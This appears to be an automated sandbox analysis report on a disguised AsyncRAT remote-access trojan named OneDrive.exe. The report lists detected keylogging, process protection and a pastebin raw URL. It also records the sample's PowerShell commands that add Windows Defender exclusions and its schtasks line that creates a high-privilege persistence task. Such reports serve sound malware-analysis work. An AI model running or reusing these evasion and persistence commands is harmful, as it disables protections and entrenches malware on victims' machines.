              Source: powershell.exe, 00000002.00000002.1392868961.00000167A9FA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1447122981.000002C05397A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1555910150.00000187D115A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1717642825.000001A63935C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 0000000C.00000002.1717642825.000001A639248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000005.00000002.1518057875.000002C06BE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
              Source: powershell.exe, 0000000C.00000002.1908754087.000001A6515C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: powershell.exe, 0000000C.00000002.1906915727.000001A651573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://.VisualC
              Source: powershell.exe, 00000002.00000002.1392868961.00000167A9D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1447122981.000002C053751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1555910150.00000187D0F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1717642825.000001A639021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000C.00000002.1879819112.000001A64908D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000C.00000002.1879819112.000001A64908D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000C.00000002.1879819112.000001A64908D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000C.00000002.1717642825.000001A639248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1412318309.00000167B9DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1501492317.000002C0637BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1650062025.00000187E0F9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1879819112.000001A64908D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: OneDrive.exe, 00000000.00000002.2587401909.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
              Source: OneDrive.exe, 00000017.00000002.2551994828.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/RPPi3ByL
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.9:49710 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to log keystrokes (.Net Source)
              Source: OneDrive.exe, XLogger.cs.Net Code: KeyboardLayout
              Source: OneDrive.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout

              Operating System Destruction

              barindex
              Protects its processes via BreakOnTermination flag
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information set: 01 00 00 00 Jump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: OneDrive.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.0.OneDrive.exe.c00000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000000.1321731249.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.2623623977.0000000012F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\ProgramData\OneDrive.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\OneDrive.exeCode function: 0_2_00007FF887B112B90_2_00007FF887B112B9
              Source: C:\Users\user\Desktop\OneDrive.exeCode function: 0_2_00007FF887B196C20_2_00007FF887B196C2
              Source: C:\Users\user\Desktop\OneDrive.exeCode function: 0_2_00007FF887B1D2E80_2_00007FF887B1D2E8
              Source: C:\Users\user\Desktop\OneDrive.exeCode function: 0_2_00007FF887B189160_2_00007FF887B18916
              Source: C:\Users\user\Desktop\OneDrive.exeCode function: 0_2_00007FF887B11CDD0_2_00007FF887B11CDD
              Source: C:\Users\user\Desktop\OneDrive.exeCode function: 0_2_00007FF887B144680_2_00007FF887B14468
              Source: C:\Users\user\Desktop\OneDrive.exeCode function: 0_2_00007FF887B1D2B80_2_00007FF887B1D2B8
              Source: C:\Users\user\Desktop\OneDrive.exeCode function: 0_2_00007FF887B1D2D80_2_00007FF887B1D2D8
              Source: C:\ProgramData\OneDrive.exeCode function: 19_2_00007FF887B012B919_2_00007FF887B012B9
              Source: C:\ProgramData\OneDrive.exeCode function: 19_2_00007FF887B01CDD19_2_00007FF887B01CDD
              Source: C:\ProgramData\OneDrive.exeCode function: 20_2_00007FF887B012B920_2_00007FF887B012B9
              Source: C:\ProgramData\OneDrive.exeCode function: 20_2_00007FF887B01CDD20_2_00007FF887B01CDD
              Source: C:\ProgramData\OneDrive.exeCode function: 21_2_00007FF887B012B921_2_00007FF887B012B9
              Source: C:\ProgramData\OneDrive.exeCode function: 21_2_00007FF887B01CDD21_2_00007FF887B01CDD
              Source: C:\ProgramData\OneDrive.exeCode function: 23_2_00007FF887B312B923_2_00007FF887B312B9
              Source: C:\ProgramData\OneDrive.exeCode function: 23_2_00007FF887B31CDD23_2_00007FF887B31CDD
              Source: OneDrive.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: OneDrive.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.0.OneDrive.exe.c00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000000.1321731249.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.2623623977.0000000012F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\ProgramData\OneDrive.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: OneDrive.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: OneDrive.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: OneDrive.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: OneDrive.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: OneDrive.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: OneDrive.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: OneDrive.exe, Settings.csBase64 encoded string: 'NwgM4n6K/Jg83k+WR6UzlIIwDfVcMQxCpgqjx9/Pq2gMiAOKPyb4sfhHDqnGretQ'
              Source: OneDrive.exe.0.dr, Settings.csBase64 encoded string: 'NwgM4n6K/Jg83k+WR6UzlIIwDfVcMQxCpgqjx9/Pq2gMiAOKPyb4sfhHDqnGretQ'
              Source: OneDrive.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: OneDrive.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: OneDrive.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: OneDrive.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/21@1/2
              Source: C:\Users\user\Desktop\OneDrive.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnkJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
              Source: C:\ProgramData\OneDrive.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
              Source: C:\Users\user\Desktop\OneDrive.exeMutant created: \Sessions\1\BaseNamedObjects\jrutcxTxqD08SKSB
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
              Source: C:\Users\user\Desktop\OneDrive.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
              Source: OneDrive.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: OneDrive.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\OneDrive.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: OneDrive.exeVirustotal: Detection: 68%
              Source: OneDrive.exeReversingLabs: Detection: 76%
              Source: C:\Users\user\Desktop\OneDrive.exeFile read: C:\Users\user\Desktop\OneDrive.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\OneDrive.exe "C:\Users\user\Desktop\OneDrive.exe"
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\ProgramData\OneDrive.exe C:\ProgramData\OneDrive.exe
              Source: unknownProcess created: C:\ProgramData\OneDrive.exe "C:\ProgramData\OneDrive.exe"
              Source: unknownProcess created: C:\ProgramData\OneDrive.exe "C:\ProgramData\OneDrive.exe"
              Source: unknownProcess created: C:\ProgramData\OneDrive.exe C:\ProgramData\OneDrive.exe
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe'Jump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'Jump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'Jump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'Jump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"Jump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
